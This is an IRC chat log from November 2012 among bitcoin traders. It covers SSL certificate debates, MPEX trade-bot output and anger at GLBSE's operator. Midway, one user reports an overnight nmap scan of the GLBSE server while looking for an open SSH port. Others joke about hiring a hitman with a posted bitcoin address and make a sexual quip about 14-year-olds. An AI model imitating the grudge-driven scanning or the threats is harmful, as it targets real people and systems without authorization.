00:37:33 get off my internet Nov 20 00:37:36 LTC MINING Nov 20 00:37:37 hahahahaha Nov 20 00:38:40 Every asset issuer receives a daily email showing who is holding their assets. This allows them to move their virtual operation off the site to anywhere else they might choose. Nov 20 00:39:11 i said nothing. Nov 20 00:39:13 really depends on your definition of invalid. Nov 20 00:39:34 The use of this site is for educational and entertainment purposes only. Nov 20 00:39:43 ^^^they say it themselves Nov 20 00:39:53 I don't think there is a point in it. Nov 20 00:39:58 They have no options Nov 20 00:40:01 or any kind of useful contracts Nov 20 00:40:47 i mean regarding dub. the ssl cartels and browser makers' definition of valid isn't the only valid one Nov 20 00:41:08 Well, anyone wishing to sell F.GIGA.ETF before they get delisted at the end of December? Nov 20 00:42:06 http://blockchain.info/ so pretty much all that happens in btc is s.dice Nov 20 00:42:49 pigeons why use their certs if you don't agree with their definitinos ? Nov 20 00:43:16 For encryption? Nov 20 00:43:21 of communication... Nov 20 00:43:22 i don't use their certs for issuer trust Nov 20 00:43:32 ;;google subterfuge Nov 20 00:43:34 Subterfuge - Merriam-Webster Online: ; subterfuge - definition of subterfuge by the Free Online Dictionary ...: ; Subterfuge | Define Subterfuge at Dictionary.com: Nov 20 00:43:48 ;;lucky subterfuge Nov 20 00:43:49 http://www.merriam-webster.com/dictionary/subterfuge Nov 20 00:44:09 pigeons was the impersonal you lol. Nov 20 00:44:20 just like bitcoin wiki STUPIDLY is on https Nov 20 00:44:27 and then STUPIDLY uses a broken cert. Nov 20 00:44:33 plenty of people can't see it. Nov 20 00:44:35 its not broken Nov 20 00:44:38 it is. Nov 20 00:44:47 its not, it works fine Nov 20 00:44:56 You have to use the same thing, except browsers will warn users about your self-issued certificate. Nov 20 00:45:03 listen to me. today some lawyer guy i work with sometimes asked me a bunch of q's about bitcoin Nov 20 00:45:16 i went to the wiki in the browser and firefox popped the warning Nov 20 00:45:19 i could see him cringe. Nov 20 00:45:30 why the fuck does a wiki even need https ? Nov 20 00:45:52 It doesn't Nov 20 00:45:55 right. Nov 20 00:45:55 Firefox doesn't pop me the warning... Nov 20 00:46:08 But if its going to use it, why not get a StartSSL cert or PositiveSSL for $10? Nov 20 00:46:10 well for one cause you login to edit, so your credentials can be stolen, for another for privacy Nov 20 00:46:13 Namjies i agree, in plenty of browsers it works fine. but why cut out a fraction ? Nov 20 00:46:21 Verified by StartCom Ltd. Nov 20 00:46:22 I mean fuck, I'll donate the $10 Nov 20 00:46:28 pigeons come on, privacy. what's private ? it's a wiki. Nov 20 00:46:31 And they can get a Comodo cert Nov 20 00:46:45 Login details are private Nov 20 00:46:52 ya ok. Nov 20 00:46:55 I dont want my employer reading my wiki vandalisation Nov 20 00:46:58 comodo certs are broken Nov 20 00:47:05 people will get bored with hacking linode and will start hacking wiki accts. Nov 20 00:47:17 cause those are REAL valuable. Nov 20 00:47:20 if you trust the fingerprint of the cert its not broken. i dont trust any comodo certs Nov 20 00:47:35 only things you think should be private should be private? Nov 20 00:47:38 Comodo certs are fine Nov 20 00:48:01 pigeons should everything be encrypted just because it can ? Nov 20 00:48:16 They work in all major browsers and all major mobile browsers Nov 20 00:48:18 so are self-issued certificates... Nov 20 00:48:21 I'm in favor of https where possible Nov 20 00:48:28 why ? Nov 20 00:48:35 this is like being in favour of driving wherever possible. Nov 20 00:48:36 Just dont understand not spending $10 on a cert Nov 20 00:48:38 mircea_popescu: it is a valid stance. why cant they offer ssl? why cant people use it? Nov 20 00:48:39 because security derp Nov 20 00:48:40 NO. drive wherever NEEDED! Nov 20 00:48:51 i dont understand spending anything on a fucking comodo cert Nov 20 00:49:04 OK, get a geotrust one then... Nov 20 00:49:10 any cartel cert Nov 20 00:49:12 Browsers should not pop such a warning for self-issued certificates. Really sends the wrong message to users. Nov 20 00:49:15 It's irrelevant which issuer you use as long as they're a valid root CA Nov 20 00:49:24 what is valid? Nov 20 00:49:37 I decide which CAs are valid Nov 20 00:49:38 Whatever the browser moguls are supporting right now Nov 20 00:49:43 Comodo Nov 20 00:49:48 Geotrust Nov 20 00:50:04 Disclosure: I'm a Comodo reseller :P Nov 20 00:50:08 and i decide none of them are. i trust individual fingerprints. yes there are challenges to that, but we're working on them. al ot better already than using networks solutions or comodo Nov 20 00:50:12 or geotrust Nov 20 00:50:14 all this is ireelevant anyway Nov 20 00:50:27 shoot the system monkey that got it wrong, load another from spares Nov 20 00:50:57 Well, I think the wiki is better off accomodating the majority of its users than a few fringes who have a personal issue with CAs :/ Nov 20 00:51:24 well i think the wiki shouldt cater to the few fringes who have an issue with centralized currency Nov 20 00:52:17 If you can show that most of those people have an issue with root CAs I'll be happy to defer Nov 20 00:52:25 jesus i didn't realise pigeons had such strong feelings on the subject Nov 20 00:52:27 51% attack? Nov 20 00:52:32 what difference does it make !? it's just a wiki ;/ Nov 20 00:53:09 on frontpage there's software on download, better download it over ssl Nov 20 00:53:24 although it's rather weak argument Nov 20 00:53:43 one should check checksum instead Nov 20 00:53:55 wikipedia works over http Nov 20 00:54:07 afaik the acct hacking isn't a big deal. does anyone know ? Nov 20 00:54:28 wikipedia works over http and https. so does bitcoin wiki. Nov 20 00:54:41 no. http redirects to https. Nov 20 00:54:50 oh Nov 20 00:55:26 why is it on .it? Nov 20 00:55:32 Also, that Nov 20 00:55:39 prolly someone happened to have that domain. Nov 20 00:55:41 have you seen the woikipedia attack where people figure out what you are looking at by some sort of checksum of the returned encrypted page based on comparing it to the db dumps? Nov 20 00:55:43 because some assclown like gengix set it up probably Nov 20 00:56:06 end all further discussion of why it may or may not be retarded Nov 20 00:56:08 .it is less likely to be confiscated I expect Nov 20 00:56:28 jurov: can you make cool widgets? Nov 20 00:56:35 and how much do you charge? Nov 20 00:56:48 whois says "Christoph Glitsch" Nov 20 00:58:59 "Christoph Glitsch" owns about11,430 other domains Nov 20 00:59:26 ..... Nov 20 00:59:34 That's a lot of domains Nov 20 01:00:25 hmm he has hurrdurr.it Nov 20 01:01:06 .... Nov 20 01:01:21 it somehow troubles me Nov 20 01:02:09 why would they confiscate the btc wiki ;/ Nov 20 01:02:41 heh Nov 20 01:04:03 I dunno, it was probbaly set up during last year when all the shit was going down about BTC being investigated because of SR Nov 20 01:04:09 A lot of people were paranoid last year Nov 20 01:04:23 but i fail to see the argument. the italians are way in the top of retarded Nov 20 01:04:31 no it was ther ebefore last year Nov 20 01:04:42 iirc it was started 2010 Nov 20 01:04:55 They're also way in the top of not giving a shit about the Internet :P Nov 20 01:05:13 or work Nov 20 01:05:17 or study Nov 20 01:05:20 or in general anything. Nov 20 01:07:38 i bet it has more to do with christoph glitch will register you a domain and keep your identity private, so long as you use an .it and yeah that doesnt explain why not wiki.bitcoin.org but maybe some people didnt get along Nov 20 01:09:01 http://wiki.bitcoin.org would be ideal Nov 20 01:09:05 with optional https Nov 20 01:09:39 < mircea_popescu> but i fail to see the argument. the italians are way in the top of retarded << remember the google employees going to jail b/c some kid posted a vid on youtube of a mentally ill kid being bullied? Nov 20 01:10:07 vaguely Nov 20 01:10:20 i also remember some scientists on trial cause they didn' predict an earthquake Nov 20 01:10:23 they do give a shit about the internet sometimes then Nov 20 01:10:36 italy is really like a sort of independent Louisiana. Nov 20 01:10:39 oh, lol, yeah, i'd forgotten the earthquake thing Nov 20 01:10:49 so retarded it boggles. Nov 20 01:11:22 louisiana ain't so bad. mississippi now... Nov 20 01:11:47 biloxi/gulfport is kinda nice tho Nov 20 01:11:57 morgan freeman is from mississipi Nov 20 01:12:07 with mississipi we wouldn't have no morgan freeman Nov 20 01:12:11 just avoid the jefferson davis tourist trap Nov 20 01:12:44 morgan freeman wouldnt be so cool if he wasn' ttrying to get away from shitty mississippi Nov 20 01:13:33 [MPEX] [S.MPOE] 16827 @ 0.0005024 = 8.4539 BTC [+] Nov 20 01:13:34 [MPEX] [S.MPOE] 5373 @ 0.00050249 = 2.6999 BTC [+] Nov 20 01:14:05 Azelphur: you bitch Nov 20 01:14:16 smickles: I bitch Nov 20 01:14:29 what do Nov 20 01:14:34 i can install steam on my compy, and it shows it working, but a message pops up and says i'm not part of the beta Nov 20 01:14:39 then closes it Nov 20 01:14:44 smickles: allow me to educate you Nov 20 01:14:53 smickles: in terminal, steam steam://install/440 Nov 20 01:14:58 you are now a 1337 h4x0r Nov 20 01:15:11 no fuckin way, just use the game id? Nov 20 01:15:16 yup Nov 20 01:15:31 it's only been that you could install tf2 for a few minutes now Nov 20 01:15:35 so that may be a bug and revoked Nov 20 01:15:46 but you could always get into the beta client itself (just not install steam) since the beginning Nov 20 01:15:54 hmm, not workin Nov 20 01:15:54 I've been in the official beta since the beginning near enough Nov 20 01:16:00 Did you know you can unlock or relock any steam achievement too? Nov 20 01:16:02 you need to run that with steam closed Nov 20 01:16:07 yeah thats the normal message if you're not in the beta Nov 20 01:16:10 Game not required. Nov 20 01:16:22 Namjies: http://steamcommunity.com/id/Azelphur/stats/TF2 nope *sarcasm* :P Nov 20 01:16:26 oh Nov 20 01:16:34 it's steam steam://install/440 Nov 20 01:16:40 smickles: yep :) Nov 20 01:18:53 You played for almost 7 decades on EACH class. Interesting. Nov 20 01:19:04 7 decades? Nov 20 01:19:08 7 decades / class Nov 20 01:19:36 596523.2 hours of play time on each class. Nov 20 01:20:11 look at Azelphur's stats Nov 20 01:20:21 XD Nov 20 01:20:25 woah steam steam://open/games Nov 20 01:20:29 there's moar! Nov 20 01:20:53 MOAR! Nov 20 01:20:55 yep :P Nov 20 01:22:03 mircea_popescu: does s.mpoe come with any voting rights? Nov 20 01:23:38 look at terms? Nov 20 01:23:40 troll Nov 20 01:23:43 I believe it does not Nov 20 01:24:02 nope. Nov 20 01:25:32 even if it did, mp isn't allowed to release more than 50% Nov 20 01:26:13 well moreover nobody on mpex can sell more than 50% exactly because shares can't vote. Nov 20 01:26:46 none of that glbse shit with people running companies where they sold 10k shares and have 100 of their own Nov 20 01:26:57 usually selfgifted too Nov 20 01:29:33 voting rights are awesome though Nov 20 01:29:40 it's how you hostile take over a company Nov 20 01:30:22 like, mircea is to allow hostile takeover? hahaha Nov 20 01:31:02 well you can still give stock voting rights Nov 20 01:31:04 mircea says hostyle, doggystyle, any style will do Nov 20 01:31:15 and maintain control Nov 20 01:31:20 facebook stock is that way Nov 20 01:31:48 the stock zuckerberg owns, has like 2-3x the votes as a normal stock bought on the market Nov 20 01:33:30 well, if you so crave shares with voting rights, i can privately issue some for coinbr :P Nov 20 01:34:02 I secretly want to find a millionaire and buy all the MPOE stock and vote mircea out Nov 20 01:34:12 HOSTILE TAKE OVER Nov 20 01:34:17 without guns Nov 20 01:34:32 thestringpuller so how do you do a hostile takeover ? Nov 20 01:34:41 like it went with nefario ? Nov 20 01:35:22 outstanding stock has to be 1) purchasable, and 2) outside of mircea's control to be sold, and 3) voting shares under some kind of structure. Nov 20 01:35:44 but how do you enforce the vote ? Nov 20 01:36:00 I suspect since he has technical control of the market, even if the company were a company with proper voting shares, mircea could just physicall halt the sale. Nov 20 01:36:15 the reason it's set up like this is exactly that i don't want to create this possibility where something's due but unenforceable. Nov 20 01:36:23 I mean who knows, maybe MPOE doesn't even have transferrable shares. Nov 20 01:36:31 make it so the bot decides Nov 20 01:36:34 what do you mean ? Nov 20 01:37:00 say I start a company and list it on a reputable exchange Nov 20 01:37:19 i meant to midnightmagic but go ahead Nov 20 01:37:24 thestringpuller: Like a real exchange? Like NYSE? Nov 20 01:37:33 midnightmagic: lol Nov 20 01:38:03 mircea_popescu: I literally have no idea at all how you've set up MPOE. As far as I've seen, it's just a sandbox on your webserver that's fun to play with. Nov 20 01:38:07 you should put up collateral, if your business is based on a website the bot controllig the exchange should have access to that site Nov 20 01:38:16 honestly i think the nyse is a lot less real rthan mpex atm. all that bs free money, all those algo trades... Nov 20 01:38:39 midnightmagic a well, http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 you can read there Nov 20 01:38:47 Oh am I naming it incorrectly? Is it MPEX or MPOE? Nov 20 01:39:00 MPOE = mircea popescu's options emporium (the old options trading page) Nov 20 01:39:07 mpex = mircea popescu exchange Nov 20 01:39:43 mpoe-pr = the harpy all the geeks want to nail. Nov 20 01:39:59 gee whiz, i have my own glossary. i shall name it mpgloss! Nov 20 01:40:29 I'm going to trademark all these MP** and not license the trademark to you Nov 20 01:41:07 i'll care. Nov 20 01:41:22 haha. Nov 20 01:42:24 prolly get a kickback from the trademark office, you pay 1-2k to them, i change the name. Nov 20 01:43:39 cox.net ? is that where all the porn is ? Nov 20 01:44:18 haha. i used to have cox i think ... it was either that or Charter? out there in tucson Nov 20 01:44:25 looks like that is probably las vegas? Nov 20 01:44:36 https://bitcointalk.org/index.php?topic=49383.msg1345959#msg1345959 Nov 20 01:44:41 this is pretty nasty. Nov 20 01:44:46 cox in tucson Nov 20 01:44:53 :> Nov 20 01:44:54 smickles sounds like a party college. Nov 20 01:45:04 and thestringpuller, good luck getting even 4% of s.mpoe Nov 20 01:45:05 - what do you do, are you an actress ? Nov 20 01:45:08 - student Nov 20 01:45:12 - o cool, where Nov 20 01:45:16 - U of Cox in Tucson Nov 20 01:46:48 lol. UofA is a pretty good school actually.. the real party school is ASU Nov 20 01:47:16 :p Nov 20 01:47:46 My mom was vp of accounting at cox at one point in time Nov 20 01:48:02 i'm sure ther's a joke in there Nov 20 01:48:11 ha Nov 20 01:48:28 they moved her to marketing later on tho, i dunno why Nov 20 01:48:31 vircurex didn't ever allow exchange of buttcoins i see Nov 20 01:48:43 just about everything else though Nov 20 01:49:07 titcoins Nov 20 01:49:20 titcoins, hipcoins, calfcoins, we need all the coins! Nov 20 01:49:55 clitcoins Nov 20 01:50:54 there you go Nov 20 01:51:17 clitcoins yeah Nov 20 01:51:26 hoochcoins too Nov 20 01:52:32 oh hey, i finally watched the '65 version of Doctor Zhivago -- it was pretty great actualy Nov 20 01:52:35 *actually Nov 20 01:52:48 cool Nov 20 01:53:21 I forgot how in older movies that many of the credits are in the beginning of the movie. Nov 20 01:54:48 Alfred Hitchcock! Nov 20 01:55:00 he was a dickwad Nov 20 01:57:00 What about Humphrey Bogart? Nov 20 01:58:46 *shrug* Nov 20 01:59:25 %6 Nov 20 01:59:32 now you got it :D Nov 20 02:00:31 i read all these classic type books over the last four to five years -- i was talking with mircea about it a while ago Nov 20 02:01:12 kinda lead me to watch the old 65 version of that movie. was worth the 3 hours, it did the novel justice... which of course is fantastic Nov 20 02:02:50 Dank Metal - Silver and gold for BTC @ Spot Price Nov 20 02:02:55 is there anything that muppet hasn't done yet ? Nov 20 02:08:59 lol Dank Metal Nov 20 02:09:04 that would be a good album name Nov 20 02:14:39 kinda Nov 20 02:15:10 metal is socialist music Nov 20 02:15:25 because it comes from socialist countries Nov 20 02:15:54 by this reasoning babies are female Nov 20 02:15:58 cause they come out of women Nov 20 02:16:49 I was thinking like an murican for a minute Nov 20 02:35:17 Space Travel Guide: Did you know Muricans are naturally so round and fat you don't need any oil to cook them into fried meatballs? Nov 20 02:35:38 Ensuing abductions and missing people throughout America Nov 20 02:35:47 XD Nov 20 02:37:46 Well sometimes keeping it stupid simple makes a lot of sense. Nov 20 02:38:49 I don't see much logical reasons "aliens" would do most of what some people claim. Nov 20 02:43:45 Watch Invader Zim Nov 20 02:43:56 Well... it wouldn't make a lot of sense for such advanced species to do such things. Nov 20 02:44:42 Being advanced enough to visit us, they'd probably have zero interest in meddling with us or the Earth. Nov 20 02:44:55 But the nonsense spawned many great games tho. Nov 20 02:45:05 (and movies) Nov 20 02:49:26 of course. like white men have zero interest in meeddling with indigenous rainforest tribes. Nov 20 02:49:34 *meddling Nov 20 02:51:51 No, I meant, if you're technologically advanced, you're probably going to be able to use solar power to constantly recycle the same matter before being able to travel efficiently between stars Nov 20 02:52:26 Which kinds of destroy the whole need to go exterminate indigenous races and take their planet Nov 20 02:53:39 There's enough brute resources (basic elements) everywhere not to care about Earth. Nov 20 02:54:51 There's even that movie where they abduct people and take their brains out to place them into biounits to serve as processors. How pretentious is that of us? They need our brains! Nov 20 02:54:52 i hope so. but still, while like, 99,99% of us can go by without mahogany wood or ivory Nov 20 02:55:15 the few who do not, cause some havoc Nov 20 02:55:29 not to mention tiger penis Nov 20 02:56:33 Oh right... What did Futurama tell us? Ah yes, human trunks are excellent aphrodisiacs. Nov 20 02:56:33 tiger blood Nov 20 02:57:36 that's not necessary Nov 20 02:58:05 If they're still going after such senseless things, I'll call out how a miserable failure their society is before harvesting me. Nov 20 02:58:08 an equivalent of donald trump who bulldozed unique nature reservation on scotland Nov 20 02:58:15 for his golf course Nov 20 02:58:19 would suffice Nov 20 02:58:56 Why would aliens do such things specifically on Earth? Nov 20 02:59:10 [MPEX] [S.MPOE] 25250 @ 0.00050249 = 12.6879 BTC [+] Nov 20 02:59:22 why would trump build his cours especifically there? just because Nov 20 02:59:25 They could basically produce/multiply anything anywhere in outerspace. Nov 20 02:59:48 I think this might be the most retarded conversation ever Nov 20 02:59:54 But trump had to put it somewhere on Earth because it's not feasible to just put things in space. Nov 20 03:00:38 No need to harvest humans or mine Earth or take the space on Earth. Nov 20 03:01:42 dub: yes, very much. Nov 20 03:01:53 usually they make golf courses on wasteland cause they need lots of chemicals to upkeep, he did not have to put it there Nov 20 03:03:07 its the same reason china extincts an animal because they think eating its penis has medicinal benefits when it doesnt Nov 20 03:05:37 Maybe the place was close and just nice looking... Nov 20 03:06:05 Yes. Earth is quite a nice looking place, too Nov 20 03:06:30 with any luck aliens will come here and harvest both china and donald trump Nov 20 03:07:05 or become addicted to a maple syrup, did you read that? Nov 20 03:07:44 that aliens are addicted to maple syrup? Nov 20 03:08:20 (John Ringo's Live Free or Die book) Nov 20 03:09:27 If they get addicted to maple syrup they can probably just copy it indefinitly at home... Nov 20 03:09:54 Instead of taking the few that's available on Earth Nov 20 03:10:26 Open harvesting of the maple trees is probably super inneficient too... Nov 20 03:11:02 that probably falls into that mahogany/ivory argument, too. we do have decent synthetic replacements,. Nov 20 03:24:42 I meant they can probably make a 100% identic replica with an error of less than 1 atom. Nov 20 03:34:33 now you're just being silly Nov 20 03:47:02 [MPEX] [S.MPOE] 777 @ 0.00050249 = 0.3904 BTC [+] Nov 20 03:47:04 [MPEX] [S.MPOE] 14929 @ 0.0005025 = 7.5018 BTC [+] Nov 20 03:49:27 Azelphur: did you have to update your drivers or anything like that? Nov 20 03:50:06 yep Nov 20 03:51:19 Azelphur: which way did you have to do it? Nov 20 03:51:32 I did it with jockey like it tells me to :P Nov 20 03:51:48 to teh 'post-release' update? Nov 20 03:51:59 nvidia 310 Nov 20 03:52:24 oh you, i have amd Nov 20 03:52:48 ah Nov 20 03:53:00 smickles: I actually had it running on my AMD netbook on the open source drivers Nov 20 03:53:10 if you have a decent card, it may well run at a decent fps using open Nov 20 03:54:57 oh lol, my install doesn't give me the open option /me just noticed Nov 20 04:14:06 an update http://blog.smickles.com/bitcoin/the-ponzi-of-wikipedia-and-bitcoin/#update_19nov12 Nov 20 04:16:31 [MPEX] [S.MPOE] 29900 @ 0.00050223 = 15.0167 BTC [-] Nov 20 04:19:12 http://img.giftube.name/media/photos/4f421ed451c64/4f421ed451c64.gif Nov 20 04:21:49 smickles: that is an unbelievably dull drama Nov 20 04:22:47 doyouevenlift84 should certainly remain banned Nov 20 04:24:28 dub: heh, that giftube link is a 'reliable source' Nov 20 04:25:25 oh, and it's wikipedia, i don't expect the drama to be much better than that **** ENDING LOGGING AT Tue Nov 20 04:47:01 2012 **** BEGIN LOGGING AT Tue Nov 20 04:48:51 2012 Nov 20 04:50:08 dub retarded women. Nov 20 04:50:17 what sort of behaviour is that! Nov 20 05:05:11 https://bitcointalk.org/index.php?topic=115669.msg1346514#msg1346514 << oi! anyone lend any credence to all that ?! Nov 20 05:14:58 they're loving it Nov 20 05:16:11 dub they're loving it like 14 year olds Nov 20 05:39:05 14 year olds can be fun Nov 20 05:46:45 fun in bed when you're 14 Nov 20 05:46:50 otherwise they are annoying little shits Nov 20 05:59:55 [MPEX] [S.MPOE] 10769 @ 0.0005025 = 5.4114 BTC [+] Nov 20 05:59:56 [MPEX] [S.MPOE] 36800 @ 0.00050252 = 18.4927 BTC [+] Nov 20 05:59:57 [MPEX] [S.MPOE] 1831 @ 0.00050257 = 0.9202 BTC [+] Nov 20 06:38:30 thestringpuller pretty much has it. Nov 20 06:53:15 mircea_popescu: you should collect a bounty to make a film of yourself delivering flowers to nefario Nov 20 06:53:41 by means of affixing forgivemenots to my cock and having him lick them off ? Nov 20 06:54:27 that's really gay Nov 20 06:56:57 why the fuck is my system clock so out of sync Nov 20 08:59:10 [MPEX] [S.MPOE] 18800 @ 0.00050257 = 9.4483 BTC [+] Nov 20 09:42:31 [MPEX] [S.MPOE] 6096 @ 0.00050257 = 3.0637 BTC [+] Nov 20 09:42:33 [MPEX] [S.MPOE] 12598 @ 0.00050257 = 6.3314 BTC [+] Nov 20 09:42:34 [MPEX] [S.MPOE] 23706 @ 0.00050259 = 11.9144 BTC [+] Nov 20 10:41:52 [MPEX] [S.MPOE] 13415 @ 0.00050259 = 6.7422 BTC [+] Nov 20 10:41:53 [MPEX] [S.MPOE] 18585 @ 0.00050267 = 9.3421 BTC [+] Nov 20 11:21:36 [MPEX] [S.MPOE] 915 @ 0.00050267 = 0.4599 BTC [+] Nov 20 11:21:38 [MPEX] [S.MPOE] 41918 @ 0.00050268 = 21.0713 BTC [+] Nov 20 12:05:08 [MPEX] [S.MPOE] 2132 @ 0.00050268 = 1.0717 BTC [+] Nov 20 12:05:09 [MPEX] [S.MPOE] 1502 @ 0.00050268 = 0.755 BTC [+] Nov 20 12:12:50 [MPEX] [S.MPOE] 1000 @ 0.00050234 = 0.5023 BTC [-] Nov 20 12:14:47 [MPEX] [S.DICE] 150 @ 0.00339922 = 0.5099 BTC [-] Nov 20 13:06:13 any good news? Nov 20 13:11:21 my wifi is working - that's pretty good news EskimoBob :D Nov 20 13:40:31 http://www.infowars.com/student-expelled-for-refusing-location-tracking-rfid-badge/ Nov 20 13:40:33 this is pretty funny Nov 20 13:49:23 [MPEX] [S.MPOE] 31750 @ 0.00050255 = 15.956 BTC [+] Nov 20 14:06:51 I guess guruvans wifi was "almost working" :) Nov 20 14:11:47 lol Nov 20 14:58:24 Any news from scammy fuck nefario? Nov 20 15:09:20 none PsychoticBoy Nov 20 15:09:35 I think I am going to call him Nov 20 15:09:59 ok tell him I said FU Nov 20 15:11:23 no, I did not tell him that because he is actually releasing the sh info Nov 20 15:11:47 4 eq's got it last night and 4 will be released today and so on Nov 20 15:12:01 he can do up to 4 issues per day Nov 20 15:12:11 and hi promised to update his blog too. Nov 20 15:13:19 gigavps was one of the first ones Nov 20 15:15:06 ok so if I understand this correctly, he delays it again with months if he only gives info to 4 ppl each day Nov 20 15:15:19 typical scammer actions Nov 20 15:15:43 He can keep my info Nov 20 15:15:47 f him Nov 20 15:16:01 he kept my btc so Nov 20 15:16:15 al Nov 20 15:16:46 PsychoticBoy can you sign it over to me? :) Nov 20 15:16:54 hahahaa Nov 20 15:17:06 I'll use your billions for good deeds only Nov 20 15:17:10 I should have kick him in the nuts when I had the chance in London Nov 20 15:17:26 hitman? Nov 20 15:17:28 ;) Nov 20 15:18:07 lets rent a hitman on TOR Nov 20 15:18:14 Who`s in Nov 20 15:18:25 what about sending flowers? Nov 20 15:18:39 I ll send the casket Nov 20 15:19:35 Public James McCarthy Hitman rental pool: 19R1QWDSEYN8X3yLdJPpSbwnR8Ka3LEFxP JOIN JOIN JOIN Nov 20 15:24:27 lol... btw, and i ran slow scan overnight on glbse server http://bitbin.it/QZ2AXOeI Nov 20 15:24:40 no ssh port open , tho :/ Nov 20 15:29:01 Assuming it was already said here, too -- Nef apparently released at least partial asset info to giga, so maybe there's a shot. Nov 20 15:29:49 Hopefully it's not just a list of people who filed a GLBSE claim and ticked the "send to Issuer" box. Nov 20 15:30:29 Bitcoin Forum > Economy > Marketplace > Securities > GOOD NEWS! GLBSE is sending out shareholders data https://bitcointalk.org/index.php?topic=126920.0 Nov 20 15:31:18 fkn usagi is following me around the forum like a sick pervert. Nov 20 15:31:43 you poked him too much Nov 20 15:31:47 :> Nov 20 15:31:58 he probably wrote 33000 lines of code to get the alert Nov 20 15:33:45 kakobreklaaa: me poking this shitbird was really nothing. He got his ass kicked by multiple people and multiple time Nov 20 15:34:15 because he kept fucking up and ling over and over Nov 20 15:52:58 why all the hostility in the channel Nov 20 15:58:17 https://bitcointalk.org/index.php?topic=126922.0 Let's raise $1500 for some of the world's poorest people through the Christmas Charity Raffle Nov 20 16:02:28 what hostility gigavps? Nov 20 16:33:18 PsychoticBoy is a little upset Nov 20 16:34:07 [MPEX] [S.MPOE] 21900 @ 0.00050237 = 11.0019 BTC [-] Nov 20 16:52:44 yuuuuuuuuup I am upset, some ppl think they can do whatever they want with others property Nov 20 17:06:48 Who's James McCarthy? Nov 20 17:07:29 Luceo: man who glbse'd you and others for a month or more Nov 20 17:07:47 Nefario? Nov 20 17:10:17 Fuck that guy Nov 20 17:10:37 yes, that is the one Nov 20 17:15:39 8 weeks Nov 20 17:15:44 we've been waiting Nov 20 17:21:22 gigavps, i hope you don't rave prematurely Nov 20 17:21:36 wait till you get really everytihng Nov 20 17:22:58 now, if someone can squeeze that scumbag Trendon and make the BTC flow back to us... Nov 20 17:23:22 there is no btc there Nov 20 17:23:34 if not, hang this fucker and end it for good Nov 20 17:26:12 jurov i'm not raving about anything Nov 20 17:26:25 this whole mess is just beginning Nov 20 17:43:05 [MPEX] [S.MPOE] 10500 @ 0.00050237 = 5.2749 BTC [-] Nov 20 17:43:07 [MPEX] [S.MPOE] 19750 @ 0.00050255 = 9.9254 BTC [+] Nov 20 18:09:54 13:11 < EskimoBob> no, I did not tell him that because he is actually releasing the sh info Nov 20 18:09:57 13:11 < EskimoBob> 4 eq's got it last night and 4 will be released today and so on Nov 20 18:10:00 13:11 < EskimoBob> he can do up to 4 issues per day Nov 20 18:10:01 gigavps was one of the first ones wow ?! Nov 20 18:10:10 what where? Nov 20 18:10:21 why only 4 per day? Nov 20 18:12:40 jurov you run things as # ? Nov 20 18:13:01 no, just nmap requires it Nov 20 18:15:13 gigavps : well done in the end. Nov 20 18:15:33 sudo ? Nov 20 18:53:04 mircea_popescu: sudo is a command to run a command as root, if you have the permission to use it Nov 20 18:53:17 read up lol Nov 20 18:53:18 'Super User DO Nov 20 18:53:29 oh Nov 20 18:53:35 dun dun dun Nov 20 18:53:37 'mkay Nov 20 18:53:51 rhetorical question ftw Nov 20 19:00:51 By 1927, only the richest 2% of taxpayers paid any federal income tax Nov 20 19:00:55 ftr. Nov 20 19:05:00 lol Nov 20 19:53:53 So... apparently, nefario started to send out asset lists... Nov 20 19:57:31 Mircea, you might actually have to find someone to buy ASICMINER shares from. Nov 20 20:49:49 [MPEX] [S.MPOE] 10900 @ 0.00050268 = 5.4792 BTC [+] Nov 20 21:42:21 [MPEX] [S.MPOE] 10198 @ 0.00050268 = 5.1263 BTC [+] Nov 20 21:42:22 [MPEX] [S.MPOE] 20600 @ 0.00050272 = 10.356 BTC [+] Nov 20 21:42:24 [MPEX] [S.MPOE] 11852 @ 0.00050272 = 5.9582 BTC [+] Nov 20 21:53:02 this whole mess is just beginning Nov 20 21:53:14 science comes to -assets Nov 20 22:11:58 [MPEX] [S.MPOE] 1098 @ 0.00050272 = 0.552 BTC [+] Nov 20 22:12:00 [MPEX] [S.MPOE] 10252 @ 0.00050278 = 5.1545 BTC [+] Nov 20 22:34:37 [MPEX] [S.MPOE] 11348 @ 0.00050278 = 5.7055 BTC [+] Nov 20 22:34:39 [MPEX] [S.MPOE] 5052 @ 0.00050278 = 2.54 BTC [+] Nov 20 22:41:56 I was looking back on GLBSE's pricing.. "Sell fee rate, paid by seller: 0.5%" && "Buy fee rate, paid by seller: 0.5%" Couldn't that have just be written as "1% Fee paid by seller on instant orders" ? Nov 20 22:42:49 It just seems kinda messed up way to do it Nov 20 22:45:18 really? glbse did something stupid? surely not! Nov 20 22:46:25 lol :P Nov 20 22:49:10 be careful with these accusations, you wouldnt want to ruin nefario's reputation! Nov 20 22:54:15 [MPEX] [S.MPOE] 10198 @ 0.00050278 = 5.1274 BTC [+] Nov 20 22:54:16 [MPEX] [S.MPOE] 6102 @ 0.00050282 = 3.0682 BTC [+] Nov 20 23:03:38 [MPEX] [S.MPOE] 16200 @ 0.00050282 = 8.1457 BTC [+] Nov 20 23:16:10 [MPEX] [S.BVPS] 3300 @ 0.00280004 = 9.2401 BTC [-] Nov 20 23:21:23 [MPEX] [S.MPOE] 18798 @ 0.00050282 = 9.452 BTC [+] Nov 20 23:21:25 [MPEX] [S.MPOE] 21100 @ 0.00050287 = 10.6106 BTC [+] Nov 20 23:21:26 [MPEX] [S.MPOE] 6592 @ 0.00050288 = 3.315 BTC [+] Nov 20 23:27:05 [MPEX] [S.MPOE] 15900 @ 0.00050288 = 7.9958 BTC [+] Nov 20 23:37:39 [MPEX] [S.MPOE] 6328 @ 0.00050262 = 3.1806 BTC [-] Nov 20 23:59:47 [MPEX] [S.MPOE] 24797 @ 0.00050247 = 12.4597 BTC [-] Nov 20 23:59:48 [MPEX] [S.MPOE] 3458 @ 0.00050288 = 1.739 BTC [+] Nov 20 23:59:49 [MPEX] [S.MPOE] 6400 @ 0.00050289 = 3.2185 BTC [+] Nov 20 23:59:50 [MPEX] [S.MPOE] 17895 @ 0.000503 = 9.0012 BTC [+] Nov 21 00:20:59 any idea why this happens? its me mod6: Nov 21 00:21:00 (14:18) [freenode] (!) Nick mod6 is temporarily unavailable Nov 21 00:21:20 i re-auth'd with nickserv.. but i can't seem to /nick mod6 successfully Nov 21 00:21:34 need to ghost it Nov 21 00:21:38 hmm, maybe just need to disconn Nov 21 00:21:42 >nickserv< ghost mod6 Nov 21 00:21:43 -NickServ- 